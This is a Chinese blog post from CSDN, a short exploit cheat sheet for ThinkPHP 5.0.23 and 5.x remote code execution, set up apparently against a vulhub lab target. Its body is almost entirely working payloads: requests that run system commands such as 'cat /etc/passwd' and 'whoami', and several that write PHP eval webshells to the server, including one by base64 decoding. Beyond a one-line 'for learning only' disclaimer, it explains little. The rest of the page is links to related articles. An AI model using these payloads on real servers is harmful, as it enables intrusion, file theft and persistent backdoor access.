thinkphp历史漏洞利用

最新推荐文章于 2024-05-11 19:02:01 发布
最新推荐文章于 2024-05-11 19:02:01 发布
阅读量270 收藏
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53665691/article/details/135854666
版权
本文详细描述了ThinkPHP5中的两个安全漏洞(5.0.23-rce和5-rce),包括漏洞利用方法(如payload示例)、漏洞简介以及靶场环境。作者提醒,内容仅限学习参考,实际应用需谨慎处理。
摘要由CSDN通过智能技术生成

这里写自定义目录标题

一.5.0.23-rce

1.漏洞利用

# payload1
POST:/index.php?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /etc/passwd


# payload2
POST:/index.php?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php eval(\$_POST['cmd']);?>" > 1.php

在这里插入图片描述

二.5-rce

1.漏洞简介
靶场 vulhub thinkphp 5-rce

2.漏洞利用

# uri 
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

# 写入webshell
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?>

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n  YWFhPD9waHAgQGV2YWwoJF9QT1NUW2NjY10pOz8+YmJi | base64 -d > shell9.php

# 注意:Base64编码后的字符串如果含有 + 号,在URL中需要进行URL编码,及 + 号变为 %2B

在这里插入图片描述

免责声明

仅供学习参考

安全菜鸟~
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ThinkPHP 系列漏洞_thinkphp漏洞
2401_83739472的博客
04-12 1012
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。attr) : null //进行判断时,需要通过toArray()将getAttr($attr)进行数据类型转换,Output类中不存在toArray()方法,触发 think\console\Output::__call()调用不存在的方法。**一个人可以走的很快,但一群人才能走的更远。薪资区间6k-15k。
教你从防护角度看Thinkphp历史漏洞
weixin_43814458的博客
05-10 293
一、前言 19年初,网上公开了2个Thinkphp5的RCE漏洞,漏洞非常好用,导致有很多攻击者用扫描器进行全网扫描。我们通过ips设备持续观察到大量利用这几个漏洞进行批量getshell的攻击流量,本文主要从流量角度简要分析和利用thinkphp进行攻击的全网扫描和getshell流量痕迹。 二、Thinkphp RCE漏洞和扫描流量 2.1漏洞原理回顾 2.1.15.0.x版本漏洞 原理在于Thinkphp处理请求的关键类为Request(thinkphp/library/think/Requ
ThinkPHP5.0.x远程执行漏洞分析与复现
最新发布
qq_74148743的博客
05-11 843
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞由ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。
ThinkPHP历史漏洞
HAKUNAMATATATTA的博客
12-30 5815
Thinkphp 是一种开源框架。是一个由国人开发的支持windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。
thinkphp历史漏洞
weixin_30314813的博客
06-28 300
路由控制類RCE/think/App.php if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); } 變量覆蓋RCE/think/Request.php if (in...
thinkPHP_V5漏洞
qq_53099802的博客
04-28 3697
php_rce攻防世界
攻防世界 ThinkPHP V5(漏洞解析及利用)
热门推荐
Haowill的博客
04-12 1万+
ThinkPHP V5 攻防世界这道题,考察的是thinkphp V5的漏洞,接下来我详细介绍一下thinkphp V5这个漏洞。 ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5....
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的...通过合理利用这些工具,开发者可以提高项目的安全性,减少因漏洞被攻击的风险。同时,持续学习和理解安全知识,才能在面对新的威胁时,做出快速而有效的应对。
thinkphp漏洞图形化综合利用工具
05-23
Thinkphp(GUI)漏洞综合利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的支持) JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 检测不...
tp5漏洞利用工具.zip
01-03
标题中的“tp5漏洞利用工具.zip”指的是一个包含利用ThinkPHP5框架中安全漏洞的工具包,这个压缩包主要用于测试和展示ThinkPHP5代码执行漏洞的利用方式。描述提到,这个工具包含了两种方法,用于在目标系统上检测并...
thinkphp 一键漏洞检测
12-09
然而,如同所有软件一样,ThinkPHP也有可能存在安全漏洞,这些漏洞可能被恶意用户利用,对网站造成严重威胁。"thinkphp 一键漏洞检测"工具正是为了解决这个问题而设计的。 该工具适用于ThinkPHP框架的多个版本,从V...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
ThinkPHP漏洞总结
文公子的博客
11-03 2748
ThinkPHP漏洞总结 ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。 0x00前言 本篇文章将针对ThinkPHP历史漏洞进行整理复现,今后爆出的ThinkPHP漏洞,也将进行补充更新。 0x01ThinkPHP远程命令执行/代码执行漏洞 一,ThinkPHP
ThinkPHP V5(漏洞解析及利用)及tornado知识点
qq_62046696的博客
10-03 3523
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
thinkphp漏洞_【安全通告】ThinkPHP V5远程命令执行漏洞
weixin_39757169的博客
11-25 283
2019年1月11日,ThinkPHP团队发布了ThinkPHP V5版本更新,本次更新包含了一个可以导致远程代码执行的严重安全漏洞。无独有偶,该框架在2018年12月10日发布的安全更新中同样包含一个可以导致远程代码执行的严重漏洞。ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用...
Thinkphp常见漏洞总结
weixin_46622976的博客
07-12 5194
ThinkPHP漏洞整理
ThinkPHP V5.0.5漏洞_ThinkPHP5丨远程代码执行漏洞动态分析
weixin_39756192的博客
11-19 1126
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性。但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。那么今天i春秋用动态分析法来介绍远...
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2235
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。
ThinkPHP代码执行漏洞
Massimo__JAVA的博客
07-01 1835
特征:被检测系统报错页面出现“十年磨一剑-为API开发设计的高性能框架”,则判定该系统使用ThinkPHP5开发。
thinkphp5.0.24漏洞利用工具
06-28
近期网络上出现了一些ThinkPHP5.0.24漏洞利用工具,攻击者可以利用这些工具进行恶意攻击,比如模拟用户登录、上传恶意文件、获取服务器权限等。而这些攻击都可能严重危害服务器安全,甚至导致数据泄露或丢失。 因此...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值